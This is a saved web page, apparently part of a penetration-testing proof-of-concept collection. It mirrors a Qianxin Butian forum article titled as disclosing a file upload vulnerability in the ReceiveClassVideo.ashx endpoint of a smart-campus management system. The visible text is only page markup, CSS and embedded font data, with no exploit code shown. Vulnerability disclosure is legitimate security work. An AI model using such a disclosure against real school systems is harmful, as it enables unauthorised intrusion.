Penetration_Testing_POC/books/智慧校园(安校易)管理系统 ReceiveClassVideo.ashx 存在文件上传漏洞.html

<!DOCTYPE html> <html style><!--
 Page saved with SingleFile 
 url: https://forum.butian.net/article/505 
--><meta charset=utf-8>
<meta http-equiv=X-UA-Compatible content="IE=edge">
<meta name=viewport content="width=device-width, initial-scale=1">
<meta name=csrf-token content=sKaWQokrOTC3iA9XXzaH65D8iBGicq4jNmsDOLZX>
<title>智慧校园(安校易)管理系统 ReceiveClassVideo.ashx 存在文件上传漏洞</title>
<meta name=keywords content=奇安信,天眼,补天,漏洞,情报,攻防,安全>
<meta name=description content=奇安信攻防社区-智慧校园(安校易)管理系统存在文件上传漏洞>
<meta name=author content="QIANXIN Team">
<meta name=copyright content="2021 QIANXIN.com">
<style>@media (max-width:767px){}</style>
<style>/*!
 * Bootstrap v3.4.1 (https://getbootstrap.com/)
 * Copyright 2011-2019 Twitter, Inc.
 * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE)
 *//*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css */html{font-family:sans-serif;-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{margin:0}footer,nav{display:block}template{display:none}a{background-color:transparent}a:active,a:hover{outline:0}img{border:0}button,input,textarea{color:inherit;font:inherit;margin:0}button{overflow:visible}button{text-transform:none}button{-webkit-appearance:button}textarea{overflow:auto}/*! Source: https://github.com/h5bp/html5-boilerplate/blob/master/src/css/main.css */@media print{*,:after,:before{color:#000!important;text-shadow:none!important;background:0 0!important;-webkit-box-shadow:none!important;box-shadow:none!important}a,a:visited{text-decoration:underline}a[href]:after{content:" ("attr(href)")"}a[href^="#"]:after,a[href^="javascript:"]:after{content:""}pre{border:1px solid #999;page-break-inside:avoid}img{page-break-inside:avoid}img{max-width:100%!important}h2,h3,p{orphans:3;widows:3}h2,h3{page-break-after:avoid}.navbar{display:none}}@font-face{font-family:"Glyphicons Halflings";src:/* original URL: https://forum.butian.net/static/css/bootstrap/fonts/glyphicons-halflings-regular.woff2 */url(data:font/woff2;base64,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
<style>/*!
 *  Font Awesome 4.7.0 by @davegandy - http://fontawesome.io - @fontawesome
 *  License - http://fontawesome.io/license (Font: SIL OFL 1.1, CSS: MIT License)
 */@font-face{font-family:"FontAwesome";src:/* original URL: https://forum.butian.net/static/css/font-awesome/fonts/fontawesome-webfont.woff2?v=4.7.0 */url(data:font/woff2;base64,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
<style>@media (min-width:1200px){.navbar-form{width:235px}}@media (min-width:768px){.navbar-form .form-control{width:100%}}@media (max-width:767px){.global-nav{width:100%;text-align:center;z-index:1000}}@media (max-width:767px){}.global-nav .nav{height:44px;padding:0}.navbar-form .btn{position:absolute;top:8px;right:30px;color:#999;-moz-box-shadow:none;-webkit-box-shadow:none;box-shadow:none}.navbar-form .btn:hover,.navbar-form .btn:focus{color:#777}pre{white-space:pre-wrap}@media (min-width:768px){}@media (min-width:992px){}@media (min-width:1200px){}html{font-size:10px;-webkit-tap-highlight-color:transparent}body{font-family:-apple-system,"Helvetica Neue",Helvetica,Arial,"PingFang SC","Hiragino Sans GB","WenQuanYi Micro Hei","Microsoft Yahei",sans-serif;font-size:14px;line-height:1.5;color:#333;background-color:#f6f6f6;word-break:break-word}button,input,textarea{font-family:inherit;font-size:inherit;line-height:inherit}ul{padding:0}.wrap{padding-bottom:30px;position:relative}.main{background-color:#fff;border-radius:4px}.mb-20{margin-bottom:20px}.mb-50{margin-bottom:50px}.mt-10{margin-top:10px}.mt-15{margin-top:15px}.mt-30{margin-top:30px}.mt-60{margin-top:60px}.ml-10{margin-left:10px}.mr-5{margin-right:5px}.span-line{margin-left:8px;margin-right:8px;color:#999}.logo{float:left;margin:0;display:inline-block;width:150px}.logo a{display:block;height:50px;width:145px;background-image:/* original URL: https://forum.butian.net/css/default/logo.svg */url(data:image/svg+xml;base64,PHN2ZyBpZD0i5Zu+5bGCXzEiIGRhdGEtbmFtZT0i5Zu+5bGCIDEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgdmlld0JveD0iMCAwIDQyNi4xMyAxMTEuNDIiPjxkZWZzPjxzdHlsZT4uY2xzLTF7ZmlsbDojZmZmO308L3N0eWxlPjwvZGVmcz48dGl0bGU+5aWH5a6J5L+h5pS76Ziy56S+5Yy6X2xvZ288L3RpdGxlPjxwYXRoIGNsYXNzPSJjbHMtMSIgZD0iTTExMiw1Ny4zM3YtNGgzNy43OHY0aC00LjM5VjcxLjE4cS4wOCw1LjUzLTUuMTksNS40NGgtNC44OXYtNGgyLjM0YzEuMiwwLDEuNzgtLjYyLDEuNzUtMS45M1Y1Ny4zM1ptMS44LTExLjkydi00aDEzLjg1VjM4LjkzaDYuNDh2Mi41MWgxMy45M3Y0SDEzNi4zNXEzLDIuNTEsMTAuOTIsNC4zMXYzLjQ3UTEzNiw1MS42NSwxMzAuODcsNDcuNXEtNS4xLDQuMTQtMTYuMzYsNS42OVY0OS43MmM1LjI1LTEuMiw4Ljg4LTIuNjQsMTAuOTItNC4zMVptMi4wOSwyNy4yOFY1OS43NmgxOS4zN3Y3LjM2Yy4xMSwzLjgzLTEuNjcsNS42OC01LjM1LDUuNTdabTUuNDgtNGg2LjQ1YzEuMzkuMDksMi4wNS0uNjEsMi0yLjA5VjYzLjc4aC04LjQxWiIvPjxwYXRoIGNsYXNzPSJjbHMtMSIgZD0iTTE1My42Nyw1OC43MlY1NC41M2g0LjY5VjUwLjMxaDYuNTJ2NC4yMmgxNS42OVY1MC4zMWg2LjUzdjQuMjJoNC44MXY0LjE5aC01LjA2YTE1LjM2LDE1LjM2LDAsMCwxLTcuNTcsMTEuODgsOTIuNiw5Mi42LDAsMCwwLDEyLjIxLDIuMzR2NHEtMTIuMTMtMS4yNS0xOC43OC0zLjQ3LTYuNTcsMi4yMi0xOC43LDMuNDd2LTRhMTA0LDEwNCwwLDAsMCwxMi4xNy0yLjM0LDE1LjA2LDE1LjA2LDAsMCwxLTcuNTctMTEuODhabTM2LjYxLTE2Ljg2djcuMzZoLTYuMTVWNDZIMTYxLjM3djMuMjJoLTYuMTVWNDEuODZoMTMuODlWMzkuMDloNy4ydjIuNzdaTTE3Mi43NSw2OC4yMXE2LjY5LTMuMTgsNy42MS05LjQ5SDE2NS4wOVExNjUuOTMsNjUsMTcyLjc1LDY4LjIxWiIvPjxwYXRoIGNsYXNzPSJjbHMtMSIgZD0iTTE5OSw3N1Y1Mi43M2EyNywyNywwLDAsMS0zLjQ3LDEuNDNWNTAuMzVhMTcuMiwxNy4yLDAsMCwwLDUuOS0xMWg1LjlhMzIuODYsMzIuODYsMCwwLDEtMi42OCw3LjdWNzdabTcuNzQtMzF2LTRoMTBWMzkuM2g2Ljd2Mi43NmgxMC4xMnY0Wm0xLjM0LDMwLjVWNjIuMjNIMjMxLjd2Ny43cS4xNyw2LjgxLTYuMTUsNi42MVptLjEzLTI0di0zLjhoMjMuNDJ2My44Wm0wLDYuN1Y1NS40MWgyMy40MnYzLjgxWm0xNy44NiwxMC42MlY2Ni4ySDIxMy43MXY2LjMyaDEwLjEyQzIyNS4zOSw3Mi42MywyMjYuMTMsNzEuNzQsMjI2LjA1LDY5Ljg0WiIvPjxwYXRoIGNsYXNzPSJjbHMtMSIgZD0iTTIzNy43Niw0Ni40NnYtNGgxNC40OHY0SDI0OFY2NS4yNGMxLjQyLS4zLDMtLjcxLDQuNzMtMS4yMXY0LjE0YTU1LjQxLDU1LjQxLDAsMCwxLTE1LjE0LDMuNzdWNjYuNzljMS4yNS0uMDgsMi43OC0uMjQsNC42LS40NlY0Ni40NlptMTMuNDMsOC4wN1Y1MC44MXE0LjY5LTQsNS40NC0xMS41NWg2LjExYTMyLjMxLDMyLjMxLDAsMCwxLTEuMDUsNC40NGgxMy43N3Y0aC0zcS0uODQsMTEuODUtNS44NiwxOC4yYTQzLjI2LDQzLjI2LDAsMCwwLDguNDksNi44MnY0LjQ0YTQ5LjQxLDQ5LjQxLDAsMCwxLTEyLTcuNTMsNTIuMTMsNTIuMTMsMCwwLDEtMTIuNjQsNy41N1Y3Mi44MUE0MC4wNyw0MC4wNywwLDAsMCwyNTkuNzMsNjZhMzQuMzgsMzQuMzgsMCwwLDEtNS42MS0xMi44QTIxLjc4LDIxLjc4LDAsMCwxLDI1MS4xOSw1NC41M1ptOC4yNS0zLjcyYTM2LjQsMzYuNCwwLDAsMCwzLjc2LDEwLjVxMi43MS00Ljg5LDMuNDMtMTMuNTZIMjU5LjlhMTUuMSwxNS4xLDAsMCwxLTIuNDcsMy4wNloiLz48cGF0aCBjbGFzcz0iY2xzLTEiIGQ9Ik0yODAuNTYsNzYuOTFWNDAuNjRoMTMuNzN2NGEyNS44NiwyNS44NiwwLDAsMS0yLjY0LDEwLDExLjMyLDExLjMyLDAsMCwxLDMsNy40cS4xNyw4LjUzLTcuOT
<style>a{text-decoration:none}a:focus,a:hover{color:#004e31;text-decoration:underline}.navbar-inverse{background-color:#2a8c70;border-color:#2b7a5c}.navbar-inverse .navbar-nav>li>a{color:#fff;padding-left:6px;padding-right:6px}.navbar-inverse .navbar-collapse,.navbar-inverse .navbar-form{border-color:#008151}@media (max-width:767px){}@media (max-width:767px){}.tag{display:inline-block;padding:0 8px;color:#017e66;background-color:#E7F2ED;height:24px;line-height:24px;font-weight:400;font-size:13px;text-align:center}.tag[href]:focus,.tag[href]:hover{background-color:#017e66;color:#fff;text-decoration:none}.btn-primary{border-color:#008151;background-color:#009a61;color:#fff}.btn-primary.active,.btn-primary:active,.btn-primary:focus,.btn-primary:hover,.open>.btn-primary.dropdown-toggle{border-color:#00432a;background-color:#006741;color:#fff}.btn-primary.active,.btn-primary:active,.open>.btn-primary.dropdown-toggle{background-image:none}.btn-success{border-color:#4cae4c;background-color:#5cb85c;color:#fff}</style>
<style>@font-face{font-family:qax-design-icons;src:/* original URL: https://forum.butian.net/static/js/qaxd/fonts/qax-design-icons.woff */url(data:font/woff;base64,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